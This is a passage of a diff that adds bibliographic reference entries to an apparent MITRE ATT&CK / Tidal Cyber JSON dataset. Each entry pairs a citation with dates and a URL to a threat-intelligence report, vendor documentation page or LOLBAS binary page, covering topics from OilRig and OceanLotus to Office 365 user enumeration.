"value": "Microsoft NTFS File Attributes Aug 2010" + }, + { + "description": "Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.", + "meta": { + "date_accessed": "2022-02-04T00:00:00Z", + "date_published": "2021-11-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess" + ], + "source": "MITRE", + "title": "NtQueryInformationProcess function (winternl.h)" + }, + "related": [], + "uuid": "7b533ca9-9075-408d-b125-89bc7446ec8f", + "value": "NtQueryInformationProcess" + }, + { + "description": "Nyan-x-Cat. (n.d.). NYAN-x-CAT / AsyncRAT-C-Sharp. Retrieved October 3, 2023.", + "meta": { + "date_accessed": "2023-10-03T00:00:00Z", + "refs": [ + "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/blob/master/README.md" + ], + "source": "MITRE", + "title": "NYAN-x-CAT / AsyncRAT-C-Sharp" + }, + "related": [], + "uuid": "b40fc5d8-02fd-5683-88c3-592c6b06df1a", + "value": "AsyncRAT GitHub" + }, + { + "description": "Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.", + "meta": { + "date_accessed": "2021-09-30T00:00:00Z", + "date_published": "2016-04-21T00:00:00Z", + "refs": [ + "https://www.joesecurity.org/blog/3660886847485093803" + ], + "source": "MITRE", + "title": "Nymaim - evading Sandboxes with API hammering" + }, + "related": [], + "uuid": "fe6ac288-1c7c-4ec0-a709-c3ca56e5d088", + "value": "Joe Sec Nymaim" + }, + { + "description": "OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2018-02-16T00:00:00Z", + "refs": [ + "https://wiki.owasp.org/index.php/OAT-004_Fingerprinting" + ], + "source": "MITRE", + "title": "OAT-004 Fingerprinting" + }, + "related": [], + "uuid": "ec89a48b-3b00-4928-8450-d2fbd307817f", + "value": "OWASP Fingerprinting" + }, + { + "description": "OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2018-02-16T00:00:00Z", + "refs": [ + "https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning" + ], + "source": "MITRE", + "title": "OAT-014 Vulnerability Scanning" + }, + "related": [], + "uuid": "039c0947-1976-4eb8-bb26-4c74dceea7f0", + "value": "OWASP Vuln Scanning" + }, + { + "description": "Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.", + "meta": { + "date_accessed": "2022-08-22T00:00:00Z", + "date_published": "2015-08-06T00:00:00Z", + "refs": [ + "https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf" + ], + "source": "MITRE", + "title": "Obfuscated API Functions in Modern Packers" + }, + "related": [], + "uuid": "fc4434c0-373b-42fe-a0f5-683c24fa329e", + "value": "BlackHat API Packers" + }, + { + "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2017-06-30T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html" + ], + "source": "MITRE", + "title": "Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques" + }, + "related": [], + "uuid": "6d1089b7-0efe-4961-8abc-22a882895377", + "value": "FireEye Obfuscation June 2017" + }, + { + "description": "Patrick Wardle. (n.d.). Retrieved March 20, 2018.", + "meta": { + "date_accessed": "2018-03-20T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x25.html" + ], + "source": "MITRE", + "title": "objective-see 2017 review" + }, + "related": [], + "uuid": "26b757c8-25cd-42ef-bef2-eb7a28455d57", + "value": "objective-see 2017 review" + }, + { + "description": "Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.", + "meta": { + "date_accessed": "2021-09-02T00:00:00Z", + "date_published": "2021-03-02T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html" + ], + "source": "MITRE", + "title": "ObliqueRAT returns with new campaign using hijacked websites" + }, + "related": [], + "uuid": "20e13efb-4ca1-43b2-83a6-c852e03333d7", + "value": "Talos Oblique RAT March 2021" + }, + { + "description": "McMillen, D. Sperry, C. (2019, June 14). Observations of ITG07 Cyber Operations. Retrieved May 17, 2021.", + "meta": { + "date_accessed": "2021-05-17T00:00:00Z", + "date_published": "2019-06-14T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/" + ], + "source": "MITRE", + "title": "Observations of ITG07 Cyber Operations" + }, + "related": [], + "uuid": "e2d453c3-efb4-44e5-8b60-6a98dd6c3341", + "value": "IBM ITG07 June 2019" + }, + { + "description": "Falcone, R. and Wartell, R.. (2015, July 27). Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved January 22, 2016.", + "meta": { + "date_accessed": "2016-01-22T00:00:00Z", + "date_published": "2015-07-27T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + ], + "source": "MITRE", + "title": "Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload" + }, + "related": [], + "uuid": "0ab158b4-9085-481a-8458-40f7c752179f", + "value": "Palo Alto CVE-2015-3113 July 2015" + }, + { + "description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.", + "meta": { + "date_accessed": "2017-11-06T00:00:00Z", + "date_published": "2017-11-06T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/" + ], + "source": "MITRE", + "title": "OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society" + }, + "related": [], + "uuid": "ed9f5545-377f-4a12-92e4-c0439cc5b037", + "value": "Volexity OceanLotus Nov 2017" + }, + { + "description": "Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.", + "meta": { + "date_accessed": "2020-11-20T00:00:00Z", + "date_published": "2020-11-06T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/" + ], + "source": "MITRE", + "title": "OceanLotus: Extending Cyber Espionage Operations Through Fake Websites" + }, + "related": [], + "uuid": "dbea2493-7e0a-47f0-88c1-5867f8bb1199", + "value": "Volexity Ocean Lotus November 2020" + }, + { + "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2016-02-17T00:00:00Z", + "refs": [ + "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update" + ], + "source": "MITRE", + "title": "OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update" + }, + "related": [], + "uuid": "6e9acc29-06af-4915-8e01-7dcccb204530", + "value": "OceanLotus for OS X" + }, + { + "description": "Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.", + "meta": { + "date_accessed": "2019-04-15T00:00:00Z", + "date_published": "2019-04-09T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/" + ], + "source": "MITRE", + "title": "OceanLotus: macOS malware update" + }, + "related": [], + "uuid": "e97e479b-4e6d-40b5-94cb-eac06172c0f8", + "value": "ESET OceanLotus macOS April 2019" + }, + { + "description": "Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", + "meta": { + "date_accessed": "2018-05-22T00:00:00Z", + "date_published": "2018-03-13T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + ], + "source": "MITRE, Tidal Cyber", + "title": "OceanLotus ships new backdoor using old tricks" + }, + "related": [], + "uuid": "a7bcbaca-10c1-403a-9eb5-f111af1cbf6a", + "value": "ESET OceanLotus" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.", + "meta": { + "date_accessed": "2018-11-14T00:00:00Z", + "date_published": "2018-10-15T00:00:00Z", + "refs": [ + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Octopus-infested seas of Central Asia" + }, + "related": [], + "uuid": "77407057-53f1-4fde-bc74-00f73d417f7d", + "value": "Securelist Octopus Oct 2018" + }, + { + "description": "LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.", + "meta": { + "date_accessed": "2019-03-07T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/" + ], + "source": "MITRE", + "title": "Odbcconf.exe" + }, + "related": [], + "uuid": "febcaaec-b535-4347-a4c7-b3284b251897", + "value": "LOLBAS Odbcconf" + }, + { + "description": "Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.", + "meta": { + "date_accessed": "2019-03-07T00:00:00Z", + "date_published": "2017-01-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017" + ], + "source": "MITRE", + "title": "ODBCCONF.EXE" + }, + "related": [], + "uuid": "9df74876-2abf-4ced-b986-36212225d795", + "value": "Microsoft odbcconf.exe" + }, + { + "description": "GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.", + "meta": { + "date_accessed": "2021-12-09T00:00:00Z", + "date_published": "2017-07-24T00:00:00Z", + "refs": [ + "https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/" + ], + "source": "MITRE", + "title": "Office365 ActiveSync Username Enumeration" + }, + "related": [], + "uuid": "cab25908-63da-484d-8c42-4451f46086e2", + "value": "GrimBlog UsernameEnum" + }, + { + "description": "gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2020-03-24T00:00:00Z", + "refs": [ + "https://github.com/gremwell/o365enum" + ], + "source": "MITRE", + "title": "Office 365 User Enumeration" + }, + "related": [], + "uuid": "314fb591-d5f2-4f0c-ab0b-97977308b5dc", + "value": "GitHub Office 365 User Enumeration" + }, + { + "description": "Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2016-08-14T00:00:00Z", + "refs": [ + "https://github.com/itsreallynick/office-crackros" + ], + "source": "MITRE", + "title": "OfficeCrackros" + }, + "related": [], + "uuid": "6298d7b0-c6f9-46dd-91f0-41ef0ad515a5", + "value": "GitHub Office-Crackros Aug 2016" + }, + { + "description": "Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.", + "meta": { + "date_accessed": "2019-08-26T00:00:00Z", + "date_published": "2019-06-02T00:00:00Z", + "refs": [ + "https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique" + ], + "source": "MITRE", + "title": "Office Templates and GlobalDotName - A Stealthy Office Persistence Technique" + }, + "related": [], + "uuid": "f574182a-5d91-43c8-b560-e84a7e941c96", + "value": "GlobalDotName Jun 2019" + }, + { + "description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "date_published": "2019-06-11T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/office/vba/api/overview/" + ], + "source": "MITRE", + "title": "Office VBA Reference" + }, + "related": [], + "uuid": "ba0e3c5d-7934-4ece-b4a1-c03bc355f378", + "value": "Microsoft VBA" + }, + { + "description": "LOLBAS. (2021, August 16). OfflineScannerShell.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/" + ], + "source": "Tidal Cyber", + "title": "OfflineScannerShell.exe" + }, + "related": [], + "uuid": "8194442f-4f86-438e-bd0c-f4cbda0264b8", + "value": "OfflineScannerShell.exe - LOLBAS Project" + }, + { + "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020.", + "meta": { + "date_accessed": "2020-05-19T00:00:00Z", + "date_published": "2020-04-21T00:00:00Z", + "refs": [ + "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/" + ], + "source": "MITRE", + "title": "Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal" + }, + "related": [], + "uuid": "e3d932fc-0148-43b9-bcc7-971dd7ba3bf8", + "value": "Bitdefender Agent Tesla April 2020" + }, + { + "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.", + "meta": { + "date_accessed": "2017-05-03T00:00:00Z", + "date_published": "2017-04-27T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" + ], + "source": "MITRE", + "title": "OilRig Actors Provide a Glimpse into Development and Testing Efforts" + }, + "related": [], + "uuid": "fb561cdd-03f6-4867-b5b5-7e4deb11f0d0", + "value": "Palo Alto OilRig April 2017" + }, + { + "description": "Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.", + "meta": { + "date_accessed": "2018-01-08T00:00:00Z", + "date_published": "2017-10-09T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/" + ], + "source": "MITRE", + "title": "OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan" + }, + "related": [], + "uuid": "f5f3e1e7-1d83-4ddc-a878-134cd0d268ce", + "value": "OilRig New Delivery Oct 2017" + }, + { + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.", + "meta": { + "date_accessed": "2017-05-03T00:00:00Z", + "date_published": "2016-10-04T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + ], + "source": "MITRE, Tidal Cyber", + "title": "OilRig Malware Campaign Updates Toolset and Expands Targets" + }, + "related": [], + "uuid": "14bbb07b-caeb-4d17-8e54-047322a5930c", + "value": "Palo Alto OilRig Oct 2016" + }, + { + "description": "Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.", + "meta": { + "date_accessed": "2018-09-24T00:00:00Z", + "date_published": "2018-09-04T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" + ], + "source": "MITRE", + "title": "OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE" + }, + "related": [], + "uuid": "84815940-b98a-4f5c-82fe-7d8bf2f51a09", + "value": "Unit 42 OilRig Sept 2018" + }, + { + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.", + "meta": { + "date_accessed": "2020-07-28T00:00:00Z", + "date_published": "2020-07-22T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" + ], + "source": "MITRE", + "title": "OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory" + }, + "related": [], + "uuid": "2929baa5-ead7-4936-ab67-c4742afc473c", + "value": "Unit42 RDAT July 2020" + }, + { + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "meta": { + "date_accessed": "2018-08-09T00:00:00Z", + "date_published": "2018-07-25T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" + ], + "source": "MITRE", + "title": "OilRig Targets Technology Service Provider and Government Agency with QUADAGENT" + }, + "related": [], + "uuid": "320f49df-7b0a-4a6a-8542-17b0f56c94c9", + "value": "Unit 42 QUADAGENT July 2018" + }, + { + "description": "Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.", + "meta": { + "date_accessed": "2018-01-08T00:00:00Z", + "date_published": "2017-07-27T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/" + ], + "source": "MITRE", + "title": "OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group" + }, + "related": [], + "uuid": "e42c60cb-7827-4896-96e9-1323d5973aac", + "value": "OilRig ISMAgent July 2017" + }, + { + "description": "Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.", + "meta": { + "date_accessed": "2018-07-06T00:00:00Z", + "date_published": "2018-01-25T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + ], + "source": "MITRE", + "title": "OilRig uses RGDoor IIS Backdoor on Targets in the Middle East" + }, + "related": [], + "uuid": "94b37da6-f808-451e-8f2d-5df0e93358ca", + "value": "Unit 42 RGDoor Jan 2018" + }, + { + "description": "Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.", + "meta": { + "date_accessed": "2019-02-18T00:00:00Z", + "date_published": "2018-09-12T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" + ], + "source": "MITRE", + "title": "OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government" + }, + "related": [], + "uuid": "2ec6eabe-92e2-454c-ba7b-b27fec5b428d", + "value": "Palo Alto OilRig Sep 2018" + }, + { + "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.", + "meta": { + "date_accessed": "2020-05-06T00:00:00Z", + "date_published": "2019-07-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf" + ], + "source": "MITRE", + "title": "OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY" + }, + "related": [], + "uuid": "197163a8-1a38-4edd-ba73-f44e7a329f41", + "value": "ESET Okrum July 2019" + }, + { + "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2018-10-15T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html" + ], + "source": "MITRE", + "title": "Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox" + }, + "related": [], + "uuid": "a7f38717-afbe-41c1-a404-bcb023c337e3", + "value": "Talos Agent Tesla Oct 2018" + }, + { + "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.", + "meta": { + "date_accessed": "2019-05-30T00:00:00Z", + "date_published": "2017-04-13T00:00:00Z", + "refs": [ + "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/" + ], + "source": "MITRE", + "title": "Old Malware Tricks To Bypass Detection in the Age of Big Data" + }, + "related": [], + "uuid": "3430ac9b-1621-42b4-9cc7-5ee60191051f", + "value": "Securelist Malware Tricks April 2017" + }, + { + "description": "Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.", + "meta": { + "date_accessed": "2020-08-10T00:00:00Z", + "date_published": "2017-04-06T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/verclsid-exe-threat-detection/" + ], + "source": "MITRE", + "title": "Old Phishing Attacks Deploy a New Methodology: Verclsid.exe" + }, + "related": [], + "uuid": "f64e934f-737d-4461-8158-ae855bc472c4", + "value": "Red Canary Verclsid.exe" + }, + { + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "meta": { + "date_accessed": "2019-03-14T00:00:00Z", + "date_published": "2018-02-12T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + ], + "source": "MITRE", + "title": "Olympic Destroyer Takes Aim At Winter Olympics" + }, + "related": [], + "uuid": "25a2e179-7abd-4091-8af4-e9d2bf24ef11", + "value": "Talos Olympic Destroyer 2018" + }, + { + "description": "Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020.", + "meta": { + "date_accessed": "2020-05-20T00:00:00Z", + "date_published": "2020-04-07T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/" + ], + "source": "MITRE", + "title": "On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations" + }, + "related": [], + "uuid": "f71410b4-5f79-439a-ae9e-8965f9bc577f", + "value": "Crowdstrike Pirate Panda April 2020" + }, + { + "description": "LOLBAS. (2021, August 22). OneDriveStandaloneUpdater.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-22T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/" + ], + "source": "Tidal Cyber", + "title": "OneDriveStandaloneUpdater.exe" + }, + "related": [], + "uuid": "3d7dcd68-a7b2-438c-95bb-b7523a39c6f7", + "value": "OneDriveStandaloneUpdater.exe - LOLBAS Project" + }, + { + "description": "Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.", + "meta": { + "date_accessed": "2022-01-26T00:00:00Z", + "date_published": "2022-01-19T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/chasing-avaddon-ransomware" + ], + "source": "MITRE", + "title": "One Source to Rule Them All: Chasing AVADDON Ransomware" + }, + "related": [], + "uuid": "c5aeed6b-2d5d-4d49-b05e-261d565808d9", + "value": "chasing_avaddon_ransomware" + }, + { + "description": "Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Onion_routing" + ], + "source": "MITRE", + "title": "Onion Routing" + }, + "related": [], + "uuid": "0667caad-39cd-469b-91c0-1210c09e6041", + "value": "Onion Routing" + }, + { + "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.", + "meta": { + "date_accessed": "2018-08-23T00:00:00Z", + "date_published": "2018-08-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "source": "MITRE", + "title": "On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation" + }, + "related": [], + "uuid": "54e5f23a-5ca6-4feb-8046-db2fb71b400a", + "value": "FireEye FIN7 Aug 2018" + }, + { + "description": "Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2018-09-20T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/" + ], + "source": "MITRE", + "title": "On the Trail of OSX.FairyTale | Adware Playing at Malware" + }, + "related": [], + "uuid": "27f8ad45-53d2-48ba-b549-f7674cf9c2e7", + "value": "OSX.FairyTale" + }, + { + "description": "Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.", + "meta": { + "date_accessed": "2018-07-16T00:00:00Z", + "date_published": "2018-02-23T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" + ], + "source": "MITRE", + "title": "OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan" + }, + "related": [], + "uuid": "d4c2bac0-e95c-46af-ae52-c93de3d92f19", + "value": "Unit 42 OopsIE! Feb 2018" + }, + { + "description": "Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.", + "meta": { + "date_accessed": "2018-04-05T00:00:00Z", + "date_published": "2017-02-02T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" + ], + "source": "MITRE", + "title": "Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX" + }, + "related": [], + "uuid": "63787035-f136-43e1-b445-22853bbed92b", + "value": "Proofpoint ZeroT Feb 2017" + }, + { + "description": "LOLBAS. (2022, June 17). OpenConsole.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-06-17T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/" + ], + "source": "Tidal Cyber", + "title": "OpenConsole.exe" + }, + "related": [], + "uuid": "e597522a-68ac-4d7e-80c4-db1c66d2da04", + "value": "OpenConsole.exe - LOLBAS Project" + }, + { + "description": "Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.", + "meta": { + "date_accessed": "2021-10-01T00:00:00Z", + "refs": [ + "https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac" + ], + "source": "MITRE", + "title": "Open items automatically when you log in on Mac" + }, + "related": [], + "uuid": "46a480eb-52d1-44c9-8b44-7e516b27cf82", + "value": "Open Login Items Apple" + }, + { + "description": "rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.", + "meta": { + "date_accessed": "2017-07-12T00:00:00Z", + "date_published": "2016-05-18T00:00:00Z", + "refs": [ + "https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363" + ], + "source": "MITRE", + "title": "Operating with EmPyre" + }, + "related": [], + "uuid": "459a4ad5-0e28-4bfc-a73e-b9dd516d516f", + "value": "Operating with EmPyre" + }, + { + "description": "Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.", + "meta": { + "date_accessed": "2022-09-27T00:00:00Z", + "date_published": "2018-08-23T00:00:00Z", + "refs": [ + "https://securelist.com/operation-applejeus/87553/" + ], + "source": "MITRE", + "title": "Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware" + }, + "related": [], + "uuid": "336ea5f5-d8cc-4af5-9aa0-203e319b3c28", + "value": "Windows AppleJeus GReAT" + }, + { + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", + "meta": { + "date_accessed": "2016-03-02T00:00:00Z", + "date_published": "2016-02-24T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ], + "source": "MITRE", + "title": "Operation Blockbuster: Destructive Malware Report" + }, + "related": [], + "uuid": "de278b77-52cb-4126-9341-5b32843ae9f1", + "value": "Novetta Blockbuster Destructive Malware" + }, + { + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.", + "meta": { + "date_accessed": "2016-03-02T00:00:00Z", + "date_published": "2016-02-24T00:00:00Z", + "refs": [ + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" + ], + "source": "MITRE", + "title": "Operation Blockbuster: 